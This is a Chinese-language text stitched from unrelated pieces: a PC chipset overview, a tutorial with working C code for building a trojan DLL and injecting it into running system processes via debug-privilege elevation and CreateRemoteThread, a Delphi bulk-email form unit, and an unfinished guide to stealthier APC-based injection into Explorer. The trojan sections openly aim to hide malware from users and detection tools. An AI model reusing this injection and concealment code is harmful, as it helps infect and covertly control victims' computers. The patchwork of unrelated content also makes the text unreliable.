芯片组（Chipset）是主板的核心组成部分，如果说中央处理器（CPU）是整个电脑系统的心脏，那么芯片组将是整个身体的躯干。在电脑界称设计芯片组的厂家为Core Logic，Core的中文意义是核心或中心，光从字面的意义就足以看出其重要性。对于主板而言，芯片组几乎决定了这块主板的功能，进而影响到整个电脑系统性能的发挥，芯片组是主板的灵魂。芯片组性能的优劣，决定了主板性能的好坏与级别的高低。这是因为目前CPU的型号与种类繁多、功能特点不一，如果芯片组不能与CPU良好地协同工作，将严重地影响计算机的整体性能甚至不能正常工作。

　　主板芯片组几乎决定着主板的全部功能，其中CPU的类型、主板的系统总线频率，内存类型、容量和性能，显卡插槽规格是由芯片组中的北桥芯片决定的；而扩展槽的种类与数量、扩展接口的类型和数量（如USB2.0/1.1，IEEE1394，串口，并口，笔记本的VGA输出接口）等，是由芯片组的南桥决定的。还有些芯片组由于纳入了3D加速显示（集成显示芯片）、AC＇97声音解码等功能，还决定着计算机系统的显示性能和音频播放性能等。

　　台式机芯片组要求有强大的性能，良好的兼容性，互换性和扩展性，对性价比要求也最高，并适度考虑用户在一定时间内的可升级性，扩展能力在三者中最高。在最早期的笔记本设计中并没有单独的笔记本芯片组，均采用与台式机相同的芯片组，随着技术的发展，笔记本专用CPU的出现，就有了与之配套的笔记本专用芯片组。笔记本芯片组要求较低的能耗，良好的稳定性，但综合性能和扩展能力在三者中却也是最低的。服务器/工作站芯片组的综合性能和稳定性在三者中最高，部分产品甚至要求全年满负荷工作，在支持的内存容量方面也是三者中最高，能支持高达十几GB甚至几十GB的内存容量，而且其对数据传输速度和数据安全性要求最高，所以其存储设备也多采用SCSI接口而非IDE接口，而且多采用RAID方式提高性能和保证数据的安全性。

　　到目前为止，能够生产芯片组的厂家有英特尔（美国）、VIA（中国台湾）、SiS（中国台湾）、ULI（中国台湾）、AMD（美国）、NVIDIA（美国）、ATI（加拿大）、ServerWorks（美国）、IBM（美国）、HP（美国）等为数不多的几家，其中以英特尔和NVIDIA以及VIA的芯片组最为常见。在台式机的英特尔平台上，英特尔自家的芯片组占有最大的市场份额，而且产品线齐全，高、中、低端以及整合型产品都有，其它的芯片组厂商VIA、SIS、ULI以及最新加入的ATI和NVIDIA几家加起来都只能占有比较小的市场份额，除NVIDIA之外的其它厂家主要是在中低端和整合领域，NVIDIA则只具有中、高端产品，缺乏低端产品，产品线都不完整。在AMD平台上，AMD自身通常是扮演一个开路先锋的角色，产品少，市场份额也很小，而VIA以前却占有AMD平台芯片组最大的市场份额，但现在却受到后起之秀NVIDIA的强劲挑战，后者凭借其nForce2、nForce3以及现在的nForce4系列芯片组的强大性能，成为AMD平台最优秀的芯片组产品，进而从VIA手里夺得了许多市场份额，目前已经成为AMD平台上市场占用率最大的芯片组厂商，而SIS与ULI依旧是扮演配角，主要也是在中、低端和整合领域。笔记本方面，英特尔平台具有绝对的优势，所以英特尔自家的笔记本芯片组也占据了最大的市场分额，其它厂家都只能扮演配角以及为市场份额极小的AMD平台设计产品。服务器/工作站方面，英特尔平台更是绝对的优势地位，英特尔自家的服务器/工作站芯片组产品占据着绝大多数的市场份额，但在基于英特尔架构的高端多路服务器领域方面，IBM和HP却具有绝对的优势，例如IBM的XA32以及HP的F8都是非常优秀的高端多路服务器芯片组产品，只不过都是只应用在本公司的服务器产品上而名声不是太大罢了；而AMD服务器/工作站平台由于市场份额较小，以前主要都是采用AMD自家的芯片组产品，现在也有部分开始采用NVIDIA的产品。值得注意的是，曾经在基于英特尔架构的服务器/工作站芯片组领域风光无限的ServerWorks在被Broadcom收购之后已经彻底退出了芯片组市场；而ULI也已经被NVIDIA收购，也极有可能退出芯片组市场。

　　芯片组的技术这几年来也是突飞猛进，从ISA、PCI、AGP到PCI-Express，从ATA到SATA，Ultra DMA技术，双通道内存技术，高速前端总线等等 ，每一次新技术的进步都带来电脑性能的提高。2004年，芯片组技术又会面临重大变革，最引人注目的就是PCI Express总线技术，它将取代PCI和AGP，极大的提高设备带宽，从而带来一场电脑技术的革命。另一方面，芯片组技术也在向着高整合性方向发展，例如AMD Athlon 64 CPU内部已经整合了内存控制器，这大大降低了芯片组厂家设计产品的难度，而且现在的芯片组产品已经整合了音频，网络，SATA，RAID等功能，大大降低了用户的成本。

木马运行关键是隐藏,神不知鬼不觉才是王道.要隐藏,先要隐藏进程,Windows操作系统中程序以进程的
方式运行,大多数操作系统也是如此.任务管理器就可以看到当前运行的进程,所以有人HOOK相关枚举进程的函
数,让任务管理器不显示木马进程,也有人把自己的木马注册成服务运行,"任务管理器"不显示服务的.这样做只
是障眼法,进程还是存在的,最好的方法是让进程不存在,让木马作为其他进程的一个线程来运行.Windows操
作系统提出了DLL的概念,其系统API都是通过DLL的形式出现的,应用程序动态链接到DLL来调用API,DLL在
内存中只存在一个副本就可以满足不同应用程序的调用了,因此可以把木马写成DLL文件,让他作为进程的一部
分运行,最好是系统进程的一部分,一般人很难看到一个进程加载了哪些DLL,也就很难发现这种木马(用
IceSword可以看到进程的DLL模块).

一 编写一个DLL木马:

使用IDE : Visual C++ 6.0 Visual Studio.NET 2003/2005都可以.

首先建立一个Win32 Dynamic-Link Library工程.选择 A simple DLL project建立工程,然后就会看到:

BOOL APIENTRY DllMain( HANDLE hModule, // 模块句柄.
DWORD ul_reason_for_call, // 调用标志.
LPVOID lpReserved // 返回数据.
)
{
return TRUE;
}

这个是DLL的入口点函数,只能做一些简单的初始化工作.这个函数和WinMain wWinMain _tWinMain main这四个标准的入口点函数是完全不同的,DllMain会被多次调用,上述四个入口点只被系统调用一次.顺便说一句dll文件结构和exe文件是完全一致的.

DWORD ul_reason_for_call, // 调用标志.

这个参数由系统传递,用于判断调用DllMain函数时候的状态.可能是以下四个常量:

DLL_PROCESS_ATTACH: DLL被进程第一次使用时,就是进程调用LoadLibrary函数时

DLL_THREAD_ATTACH:

DLL_THREAD_DETACH:

DLL_PROCESS_DETACH: DLL被释放的时候

MSDN原文:

DLL_PROCESS_ATTACH
The DLL is being loaded into the virtual address space of the current process as a result of the process starting up or as a result of a call to LoadLibrary. DLLs can use this opportunity to initialize any instance data or to use the TlsAlloc function to allocate a thread local storage (TLS) index.

DLL_THREAD_ATTACH
The current process is creating a new thread. When this occurs, the system calls the entry-point function of all DLLs currently attached to the process. The call is made in the context of the new thread. DLLs can use this opportunity to initialize a TLS slot for the thread. A thread calling the DLL entry-point function with DLL_PROCESS_ATTACH does not call the DLL entry-point function with DLL_THREAD_ATTACH.
Note that a DLL's entry-point function is called with this value only by threads created after the DLL is loaded by the process. When a DLL is loaded using LoadLibrary, existing threads do not call the entry-point function of the newly loaded DLL.

DLL_THREAD_DETACH
A thread is exiting cleanly. If the DLL has stored a pointer to allocated memory in a TLS slot, it should use this opportunity to free the memory. The system calls the entry-point function of all currently loaded DLLs with this value. The call is made in the context of the exiting thread.

DLL_PROCESS_DETACH
The DLL is being unloaded from the virtual address space of the calling process as a result of unsuccessfully loading the DLL, termination of the process, or a call to FreeLibrary. The DLL can use this opportunity to call the TlsFree function to free any TLS indices allocated by using TlsAlloc and to free any thread local data.
Note that the thread that receives the DLL_PROCESS_DETACH notification is not necessarily the same thread that received the DLL_PROCESS_ATTACH notification.

判断:当 ul_reason_for_call 等于 DLL_PROCESS_ATTACH 时就新开一个线程启动木马.记住一定要新开一个线程,不能把DllMain当main函数用.

BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
// 启动木马线程.
CreateThread(NULL,0,MainThread,0,0,0);
break;

case DLL_THREAD_ATTACH:
break;

case DLL_THREAD_DETACH:
break;

case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

DWORD WINAPI MainThread(LPVOID lpParameter)
{
// 这里就是木马的代码了
... ...
}

二 DLL木马的启动:

远程进程插入启动木马:将木马DLL插入运行中的进程空间中,让其运行.

具体做法是先将系统权限提升到DEBUG模式下,因为只有DEBUG模式才能打开进程句柄.然后用OpenProcess函数远程以 PROCESS_Create_THREAD , PROCESS_VM_OPERATION , PROCESS_VM_WRITE
的权限打开要插入的进程,得到进程的句柄.用VirtualAllocEx函数给DLL文件的路径分配内存空间.
用WriteProcessMemory函数将DLL文件内容写入进程空间中.用CreateRemoteThread函数启动就完成
了进程的远程插入.

代码如下:


////////////////////////////////////////////////////////////////////////
// 远程插入线程
// char szDllFullPath[] DLL文件完整路径.
// DWORD dwRemoteProcessID 要插入的进程ID号
// 返回: TRUE 插入进程成功
// FALSE 失败
BOOL InjectDll(char szDllFullPath[],DWORD dwRemoteProcessID)
{
HANDLE hRemoteProcess;
if(EnableDebugPriv(SE_DEBUG_NAME) == 0)
{
return FALSE;
}

// 打开远程线程
if((hRemoteProcess = OpenProcess(PROCESS_Create_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,FALSE,dwRemoteProcessID))== NULL)
{
return FALSE;
}

char * pszLibFileRemote;

// 使用VirtualAllocEx函数在远程进程内存地址空间分配DLL文件名缓冲区
pszLibFileRemote = (char *)VirtualAllocEx( hRemoteProcess,NULL,lstrlen(szDllFullPath)+1,MEM_COMMIT,PAGE_READWRITE);
if(pszLibFileRemote == NULL)
{
return FALSE;
}

if(WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(void *)szDllFullPath,lstrlen(szDllFullPath)+1,NULL) == 0)
{
return FALSE;
}

PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle("Kernel32"),"LoadLibraryA");
if(pfnStartAddr == NULL)
{
return FALSE;
}
// 通过建立远程连接的地址:pfnStartAddr
// 传递参数 pszLibFileRemote 远程启动DLL
// 启动远程线程 LoadLibraryA 通过远程线程调用用户的DLL文件
HANDLE hRemoteThread;
if((hRemoteThread = CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL)) == NULL)
{
return FALSE;
}
return TRUE;
}

这个函数也会用到的:

////////////////////////////////////////////////////////////////////////
// 获取进程ID号
// 如无此进程则返回 0;
// char szProcName[] 进程名: .exe文件.
DWORD GetProcID(char szProcName[])
{
HANDLE th = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe = {sizeof(pe)};
DWORD dwProcID = 0;

BOOL bOK=Process32First(th,&pe);
while(bOK)
{
bOK = Process32Next(th,&pe);

LPCTSTR lpszExeFile = strrchr(pe.szExeFile,'//');
if(lpszExeFile == NULL)
lpszExeFile = pe.szExeFile;
else
lpszExeFile++;

if(strcmp(szProcName,lpszExeFile) == 0)
{
dwProcID = pe.th32ProcessID;
break;
}
}

return dwProcID;
}

////////////////////////////////////////////////////////////////////////
// 提升系统权限到DEBUG模式
int EnableDebugPriv(char szName[])
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;

// 打开进程环令牌
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
{
return 0;
}

if(!LookupPrivilegeValue(NULL,szName,&luid))
{
return 0;
}

tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = luid;
// 调整权限
if(!AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
{
return 0;
}

return 1;
}

Copy code

unit USMTP;

interface

uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
ComCtrls, Buttons, StdCtrls, Psock, NMsmtp, Db, DBTables, ExtCtrls,
Grids, DBGrids, DBClient, Provider, DBCtrls;

type
TFSMTP = class(TForm)
  PageControl1: TPageControl;
  TabSheet1: TTabSheet;
  TabSheet2: TTabSheet;
  Label1: TLabel;
  Label2: TLabel;
  Label3: TLabel;
  NMSMTP1: TNMSMTP;
  Label4: TLabel;
  Label5: TLabel;
  Label6: TLabel;
  EditHost: TEdit;
  EditPort: TEdit;
  EditUserID: TEdit;
  ButtonConnect: TSpeedButton;
  DBGrid1: TDBGrid;
  Label7: TLabel;
  Label8: TLabel;
  ButtonAdd: TSpeedButton;
  ButtonRemove: TSpeedButton;
  ButtonSend: TSpeedButton;
  ListBoxAttachments: TListBox;
  Label9: TLabel;
  Label10: TLabel;
  Panel1: TPanel;
  Query1: TQuery;
  Label11: TLabel;
  Label12: TLabel;
  EditSubject: TEdit;
  OpenDialog1: TOpenDialog;
  StatusBar1: TStatusBar;
  MemoMail: TMemo;
  EditTo: TEdit;
  EditCC: TEdit;
  EditBCC: TEdit;
  ButtonDisconnect: TSpeedButton;
  Label13: TLabel;
  Label14: TLabel;
  EditName: TEdit;
  EditAddress: TEdit;
  Label15: TLabel;
  Label16: TLabel;
  ButtonConnection2: TSpeedButton;
  Button1: TButton;
  Edit1: TEdit;
  Label17: TLabel;
  Label18: TLabel;
  Label19: TLabel;
  Label20: TLabel;
  Edit2: TEdit;
  DBLookupComboBox1: TDBLookupComboBox;
  DataSource1: TDataSource;
  Query1BDEDesigner: TIntegerField;
  Query1BDEDesigner3: TStringField;
  Query1BDEDesigner4: TStringField;
  Query1BDEDesigner5: TStringField;
  Query1BDEDesigner6: TFloatField;
  Query1BDEDesigner7: TStringField;
  Query1BDEDesigner8: TStringField;
  Query1BDEDesigner9: TStringField;
  Query1BDEDesigner10: TStringField;
  Query1BDEDesigner11: TStringField;
  Query1BDEDesigner12: TStringField;
  Button2: TSpeedButton;
  Panel2: TPanel;
  Image1: TImage;
  QDepartKind: TQuery;
  DSDepartKind: TDataSource;
  Query1BDEDesigner2: TStringField;
  QDepartKindBDEDesigner: TStringField;
  QDepartKindID: TIntegerField;
  Memo1: TMemo;
  procedure ButtonConnectClick(Sender: TObject);
  procedure ButtonDisconnectClick(Sender: TObject);
  procedure NMSMTP1Connect(Sender: TObject);
  procedure NMSMTP1Disconnect(Sender: TObject);
  procedure ButtonAddClick(Sender: TObject);
  procedure ButtonRemoveClick(Sender: TObject);
  procedure ButtonSendClick(Sender: TObject);
  procedure NMSMTP1EncodeStart(Filename: String);
  procedure NMSMTP1EncodeEnd(Filename: String);
  procedure NMSMTP1ConnectionFailed(Sender: TObject);
  procedure NMSMTP1ConnectionRequired(var Handled: Boolean);
  procedure NMSMTP1Failure(Sender: TObject);
  procedure NMSMTP1HostResolved(Sender: TComponent);
  procedure NMSMTP1InvalidHost(var Handled: Boolean);
  procedure NMSMTP1PacketSent(Sender: TObject);
  procedure NMSMTP1RecipientNotFound(Recipient: String);
  procedure NMSMTP1SendStart(Sender: TObject);
  procedure NMSMTP1Success(Sender: TObject);
  procedure NMSMTP1HeaderIncomplete(var handled: Boolean;
    hiType: Integer);
  procedure FormCloseQuery(Sender: TObject; var CanClose: Boolean);
  procedure ButtonConnection2Click(Sender: TObject);
  procedure FormShow(Sender: TObject);
  procedure FormClose(Sender: TObject; var Action: TCloseAction);
  procedure Button1Click(Sender: TObject);
  procedure DBLookupComboBox1Click(Sender: TObject);
  procedure Button2Click(Sender: TObject);
private
  { Private declarations }
public
  { Public declarations }
end;

var
FSMTP: TFSMTP;

implementation
uses DataModoule,UnitSending,p_fandp;
{$R *.DFM}

procedure TFSMTP.ButtonConnectClick(Sender: TObject);
begin
NMSMTP1.Host:=EditHost.Text;
NMSMTP1.Port:=StrToInt(EditPort.Text);
NMSMTP1.UserId:=EditUserId.Text;
NMSMTP1.Connect;
ButtonConnect.Enabled:=False;
ButtonDisConnect.Enabled:=True;
end;

procedure TFSMTP.ButtonDisconnectClick(Sender: TObject);
begin
NMSMTP1.Disconnect;
ButtonConnect.Enabled:=True;
ButtonDisConnect.Enabled:=False;
end;

procedure TFSMTP.NMSMTP1Connect(Sender: TObject);
begin
StatusBar1.SimpleText:='已经连接';
Panel1.Color:=clBlue;
end;

procedure TFSMTP.NMSMTP1Disconnect(Sender: TObject);
begin
if StatusBar1<>nil then begin
StatusBar1.SimpleText:='断开连接';
Panel1.Color:=clRed;
end;
end;

procedure TFSMTP.ButtonAddClick(Sender: TObject);
begin
if OpenDialog1.Execute then
ListBoxAttachments.Items.Add(OpenDialog1.FileName);
end;

procedure TFSMTP.ButtonRemoveClick(Sender: TObject);
begin
ListBoxAttachments.Items.Delete(ListBoxAttachments.ItemIndex);
end;

procedure TFSMTP.ButtonSendClick(Sender: TObject);
{var
i_sum,i_count:integer;
s_To:string;
begin
i_sum:=0;i_count:=0;
with DBGrid1.DataSource.DataSet do
if (isempty=false) and (recordcount>0) then begin
Application.CreateForm(TFormSending, FormSending);
FormSending.Show;
FormSending.Label1.Caption:='共'+inttostr(recordcount)+'封邮件';
FormSending.Label4.Caption:=FormSending.Label1.Caption;
DisableControls;
first;
while not eof do begin
  s_To:=Query1.FindField('电子邮箱').asstring;
  i_sum:=i_sum+1;
  if (trim(s_to)='')and(pos('@',s_To)<=0) then begin
i_count:=i_count+1;
FormSending.Label3.Caption:='目前共有'+inttostr(i_count)+'封空白的邮件地址';
FormSending.Label6.Caption:=FormSending.Label3.Caption;
end
else begin
FormSending.Label2.Caption:='正在发送第'+inttostr(i_sum)+'封邮件... ... ... ...';
FormSending.Label5.Caption:=FormSending.Label2.Caption;
Editto.Text:=s_to;
// EditBCC.Text:=s_to;
// EditCC.Text:=s_to;
NMSMTP1.PostMessage.FromAddress:=EditAddress.Text;
NMSMTP1.PostMessage.FromName:=EditName.Text;
NMSMTP1.PostMessage.Subject:=EditSubject.Text;
NMSMTP1.PostMessage.ToAddress.Text:=Editto.Text;
// NMSMTP1.PostMessage.ToBlindCarbonCopy.Add(EditBCC.Text);
// NMSMTP1.PostMessage.ToCarbonCopy.Add(EditCC.Text);
NMSMTP1.PostMessage.Attachments.AddStrings(ListBoxAttachments.Items);
NMSMTP1.PostMessage.Body.Assign(MemoMail.Lines);
NMSMTP1.SendMail; //
// ts_CC.Add(s_To);

end;
next;
end;
EnableControls;
end;
ShowMessage('邮件发送完毕！#1');
FormSending.Close;//}
//---------------------------------------------------
var
s_To:string;
// ts_To: TStrings;
begin
// ts_To:=TStringList.Create;
// ts_To.Clear;
with DBGrid1.DataSource.DataSet do begin
first;
DBGrid1.DataSource.DataSet.DisableControls;
while not eof do begin
s_To:=Query1.FindField('电子邮箱').asstring;
if (trim(s_To)<>'')and(pos('@',s_To)>0) then begin
  //ts_To.Add(s_To);
  Memo1.Lines.Add(s_To);
  end;
next;
end;
first;
DBGrid1.DataSource.DataSet.EnableControls;
end;
NMSMTP1.PostMessage.FromAddress:=EditAddress.Text;
NMSMTP1.PostMessage.FromName:=EditName.Text;
NMSMTP1.PostMessage.Subject:=EditSubject.Text;
NMSMTP1.PostMessage.ToAddress.Text:=Memo1.Text;
//NMSMTP1.PostMessage.ToAddress.AddStrings(ts_To);
//NMSMTP1.PostMessage.ToAddress.Text:=s_To;
//NMSMTP1.PostMessage.ToAddress.Add(Editto.Text);
//NMSMTP1.PostMessage.ToBlindCarbonCopy.AddString(ts_BCC.Text);
//NMSMTP1.PostMessage.ToBlindCarbonCopy.Add(EditBCC.Text);
//NMSMTP1.PostMessage.ToCarbonCopy.AddStrings(ts_CC);
//NMSMTP1.PostMessage.ToCarbonCopy.Add(EditCC.Text);
NMSMTP1.PostMessage.Attachments.AddStrings(ListBoxAttachments.Items);
NMSMTP1.PostMessage.Body.Text:=MemoMail.Text;
//NMSMTP1.PostMessage.Body.Assign(MemoMail.Lines);
//NMSMTP1.PostMessage.Body.AddStrings(MemoMail.Lines);
NMSMTP1.SendMail;
ShowMessage('邮件发送完毕！#1');//}
end;

procedure TFSMTP.NMSMTP1EncodeStart(Filename: String);
begin
StatusBar1.SimpleText:='Encoding'+Filename;
end;

procedure TFSMTP.NMSMTP1EncodeEnd(Filename: String);
begin
StatusBar1.SimpleText:='Finished Encoding'+Filename;
end;

procedure TFSMTP.NMSMTP1ConnectionFailed(Sender: TObject);
begin
ShowMessage('连接失败');
end;

procedure TFSMTP.NMSMTP1ConnectionRequired(var Handled: Boolean);
begin
if MessageDlg('Connection Required Connect ?',
  mtConfirmation,mbOkCancel,0)=mrOk then begin
Handled:=TRUE;
NMSMTP1.Connect;
end;
end;

procedure TFSMTP.NMSMTP1Failure(Sender: TObject);
begin
StatusBar1.SimpleText:='错误';
end;

procedure TFSMTP.NMSMTP1HostResolved(Sender: TComponent);
begin
StatusBar1.SimpleText:='Host Resolved';
end;

procedure TFSMTP.NMSMTP1InvalidHost(var Handled: Boolean);
var TmpStr:String;
begin
if inputquery('Invalid Host!','Specify a new host:',TmpStr) then
begin
NMSMTP1.Host:=TmpStr;
Handled:=True;
end;
end;

procedure TFSMTP.NMSMTP1PacketSent(Sender: TObject);
begin
StatusBar1.SimpleText:=IntToStr(NMSMTP1.BytesSent)
+'bytes of'+IntToStr(NMSMTP1.BytesTotal)+'sent';
end;

procedure TFSMTP.NMSMTP1RecipientNotFound(Recipient: String);
begin
ShowMessage('Recipient'+''''+Recipient+''''+'not found');
end;

procedure TFSMTP.NMSMTP1SendStart(Sender: TObject);
begin
StatusBar1.SimpleText:='发送邮件';
end;

procedure TFSMTP.NMSMTP1Success(Sender: TObject);
begin
StatusBar1.SimpleText:='成功';
end;

procedure TFSMTP.NMSMTP1HeaderIncomplete(var handled: Boolean;
hiType: Integer);
begin
ShowMessage('Header Incomplete.');
end;

procedure TFSMTP.FormCloseQuery(Sender: TObject; var CanClose: Boolean);
begin
NMSMTP1.Abort;
end;

procedure TFSMTP.ButtonConnection2Click(Sender: TObject);
begin
if ButtonConnection2.Caption='连接' then begin
NMSMTP1.Host:=EditHost.Text;
NMSMTP1.Port:=StrToInt(EditPort.Text);
NMSMTP1.UserId:=EditUserId.Text;
NMSMTP1.Connect;
Panel1.Color:=clBlue;
ButtonConnection2.Caption:='断开';
end
else begin
NMSMTP1.Disconnect;
Panel1.Color:=clRed;
ButtonConnection2.Caption:='连接';
end;
end;

procedure TFSMTP.FormShow(Sender: TObject);
begin
//DataMod.TableDepartment.Open;
if gs_potence[Self.Tag] = '2' then begin
ButtonSend.Enabled := False;
end;
Query1.Open;
QDepartKind.Open;
//ButtonConnection2.Click;
end;

procedure TFSMTP.FormClose(Sender: TObject; var Action: TCloseAction);
begin
//DataMod.TableDepartment.Close;
Query1.Close;
QDepartKind.Close;
//ButtonConnection2.Click;
Action:=CaFree;
end;

procedure TFSMTP.Button1Click(Sender: TObject);
begin
if NMSMTP1.Verify(Edit1.Text) then
//   ShowMessage(Edit1.Text+' verified')
else
  ShowMessage(Edit1.Text+' not verified');
end;

procedure TFSMTP.DBLookupComboBox1Click(Sender: TObject);
begin
Query1.Filter:='部门分类='+vartostr(DBLookupComboBox1.KeyValue);
end;

procedure TFSMTP.Button2Click(Sender: TObject);
begin
Self.Close;
end;

end.

向一个运行中的进程注入自己的代码，最自然莫过于使用CreateRemoteThread，如今远线程注入已经是泛滥成灾，同样的监测远线程注入、防止远线程注入的工具也举不胜举，一个木马或后门启动时向Explorer或IE的注入操作就像在自己脸上写上“我是贼”一样。


用户态代码想要更隐蔽地藏身于别的进程，就应该在注入的环节隐蔽自己的行为。下面就介绍一种非常简单不过比较暴力的方法，给出的示例为在Explorer里加载自己的dll。


首先提到的就是一个API:QueueUserAPC


DWORD QueueUserAPC(

PAPCFUNC pfnAPC, // APC function

HANDLE hThread, // handle to thread

ULONG_PTR dwData // APC function parameter ;


大家对这个API应该并不陌生，它直接转入了系统服务NtQueueApcThread从而利用KeInsertQueueApc向给出的目标线程的APC队列插入一APC对象。倘若KiDeliverApc顺利的去构造apc环境并执行我们的代码那一切就OK了，只可惜没有那么顺利的事，ApcState中UserApcPending是否为TRUE有重要的影响，结果往往是你等到花儿都谢了你的代码还是没得到执行。在核心态往往不成问题，自己动手赋值，可是用户态程序可不好做，怎么办?其实最简单的，不好做就不做啰，让系统去干。


实际上应用程序在请求“alertable”的等待时系统就会置UserApcPending为TRUE(当KeDelayExecutionThread/KeWaitForMultipleObjects/KeWaitForSingleObject 使用TestForAlertPending时就有可能，此外还有KeTestAlertThread等